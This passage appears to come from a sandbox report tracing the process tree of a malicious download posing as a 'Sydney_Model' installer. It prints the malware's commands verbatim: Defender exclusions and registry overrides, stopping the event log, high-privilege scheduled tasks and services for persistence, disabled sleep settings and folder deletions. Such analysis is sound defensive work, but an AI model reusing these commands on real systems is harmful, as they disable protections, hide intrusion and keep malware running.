        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:2376
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 788
        5⤵
        Program crash
        
        PID:2360
- C:\Users\Admin\Documents\SimpleAdobe\2qaB5SgEOmYhO2un5YlD5_Co.exe
  C:\Users\Admin\Documents\SimpleAdobe\2qaB5SgEOmYhO2un5YlD5_Co.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:568
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious use of SetWindowsHookEx
    PID:5528
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\AEHDAKFIJJKK" & exit
      4⤵
      PID:4728
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:552
- C:\Users\Admin\Documents\SimpleAdobe\UXEZ13dcixfxO3xLyNbEfiBU.exe
  C:\Users\Admin\Documents\SimpleAdobe\UXEZ13dcixfxO3xLyNbEfiBU.exe
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Checks BIOS information in registry
  - Drops startup file
  - Executes dropped EXE
  - Adds Run key to start application
  - Checks whether UAC is enabled
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  PID:2344
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:732
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\WinTrackerSP\WinTrackerSP.exe" /tn "WinTrackerSP LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5780
- C:\Users\Admin\Documents\SimpleAdobe\bjWxSkKqXMR7odWAJEcWxhoj.exe
  C:\Users\Admin\Documents\SimpleAdobe\bjWxSkKqXMR7odWAJEcWxhoj.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetWindowsHookEx
  PID:6104
- - C:\Users\Admin\AppData\Local\Temp\7zSE94B.tmp\Install.exe
    .\Install.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetWindowsHookEx
    PID:2576
  - - C:\Users\Admin\AppData\Local\Temp\7zSF716.tmp\Install.exe
      .\Install.exe /UdidrvWdo "385132" /S
      4⤵
      Checks BIOS information in registry
      Checks computer location settings
      Executes dropped EXE
      Enumerates system info in registry
      Suspicious use of SetWindowsHookEx
      PID:5168
    - - C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
        5⤵
        
        PID:1864
      - C:\Windows\SysWOW64\cmd.exe
        
        /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        6⤵
        
        PID:5192
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2936
        
        C:\Windows\SysWOW64\Wbem\WMIC.exe
        
        "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
        8⤵
        
        PID:216
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bTVQzzKDZQMhkLPDbz" /SC once /ST 08:54:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSF716.tmp\Install.exe\" hU /EVdidvM 385132 /S" /V1 /F
        5⤵
        Drops file in Windows directory
        Scheduled Task/Job: Scheduled Task
        
        PID:2732
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5168 -s 1088
        5⤵
        Program crash
        
        PID:4008
- C:\Users\Admin\Documents\SimpleAdobe\2uWT3i9q6WVc78KsAIFaSXBv.exe
  C:\Users\Admin\Documents\SimpleAdobe\2uWT3i9q6WVc78KsAIFaSXBv.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:1548
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Checks processor information in registry
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of SetWindowsHookEx
    PID:5608
  - - C:\ProgramData\AAEHIDAKEC.exe
      "C:\ProgramData\AAEHIDAKEC.exe"
      4⤵
      PID:5764
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:456
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:3488
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:4604
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4604 -s 468
        6⤵
        Program crash
        
        PID:4272
  - - C:\ProgramData\FBFHDBKJEG.exe
      "C:\ProgramData\FBFHDBKJEG.exe"
      4⤵
      PID:1268
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:6032
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        
        PID:5012
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BGHIIJDGHCBF" & exit
      4⤵
      PID:1660
    - - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 10
        5⤵
        Delays execution with timeout.exe
        
        PID:2504
- C:\Users\Admin\Documents\SimpleAdobe\towmbSBzenOBl3_jr7QhnVTj.exe
  C:\Users\Admin\Documents\SimpleAdobe\towmbSBzenOBl3_jr7QhnVTj.exe
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  PID:4568
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
    3⤵
    - Power Settings
    PID:4576
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:5280
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:1396
- - C:\Windows\system32\powercfg.exe
    C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:5788
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe delete "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:5008
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe create "CIFUBVHI" binpath= "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe" start= "auto"
    3⤵
    - Launches sc.exe
    PID:5504
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe stop eventlog
    3⤵
    - Launches sc.exe
    PID:6008
- - C:\Windows\system32\sc.exe
    C:\Windows\system32\sc.exe start "CIFUBVHI"
    3⤵
    - Launches sc.exe
    PID:5644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:5524

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:5248

C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\setup.exe
"C:\Users\Admin\Downloads\Download_ _Sydney_Model rar_(278,37_Mb)_In_free_mode__Turbobi\setup.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4220

C:\Windows\SysWOW64\neosowbb\jhrsuqtz.exe
C:\Windows\SysWOW64\neosowbb\jhrsuqtz.exe /d"C:\Users\Admin\Documents\SimpleAdobe\T0qJC09GvDEuSkMeGFLdaMFx.exe"
1⤵
- Executes dropped EXE
PID:1236
- C:\Windows\SysWOW64\svchost.exe
  svchost.exe
  2⤵
  PID:2860
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 512
  2⤵
  - Program crash
  PID:5556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5580 -ip 5580
1⤵
PID:4892

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:5236
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ffcc63546f8,0x7ffcc6354708,0x7ffcc6354718
  2⤵
  PID:3696
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1936,12266985397052784942,8797763957062966665,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 /prefetch:3
  2⤵
  PID:4956

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1236 -ip 1236
1⤵
PID:5448

C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
1⤵
PID:5876
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  PID:5064
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  PID:5848
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  - Power Settings
  PID:3368
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  - Power Settings
  PID:3852
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:3584
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:5768
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:3332
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:5384
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:400
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5112
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:3416
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:3460
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:2960
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:4880
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:2936
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:1192
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:4756
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:5404
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4964
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2900
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:636
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:968
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:2692
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:3832
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5420
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:5804
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:1488
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:4208
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:4132
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5276
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:1748
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:2404
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5128
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:3204
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:4832
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:1672
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:5632
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:5976
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:1548
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:1436
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:1656
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:2412
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2680
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:848
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5568
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:3916
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:2628
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:1824
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:3828
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:3876
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:4408
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4748
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:692
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:2752
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:1960
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:1268
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:3932
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4880
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:2200
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:3128
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:1384
  - - C:\Windows\system32\svchost.exe
      svchost.exe
      4⤵
      PID:4140
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:5584
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:3908
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:1220
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:964
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5932
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:4864
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4544
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:3284
- - C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe
    "C:\ProgramData\lmguvcpihozg\eqtpkqwqodik.exe"
    3⤵
    PID:2940
- C:\Windows\system32\svchost.exe
  svchost.exe
  2⤵
  PID:5988

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
1⤵
PID:5080
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffcc63546f8,0x7ffcc6354708,0x7ffcc6354718
  2⤵
  PID:3864
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1440,4540234078645696434,12338683948138547331,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 /prefetch:3
  2⤵
  PID:5156

C:\Users\Admin\AppData\Local\Temp\7zSFA71.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSFA71.tmp\Install.exe AG /UCDdidJQf 525403 /S
1⤵
PID:1504
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  PID:1004
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:852
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:3516
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1964
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:2616
- - C:\Windows\SysWOW64\reg.exe
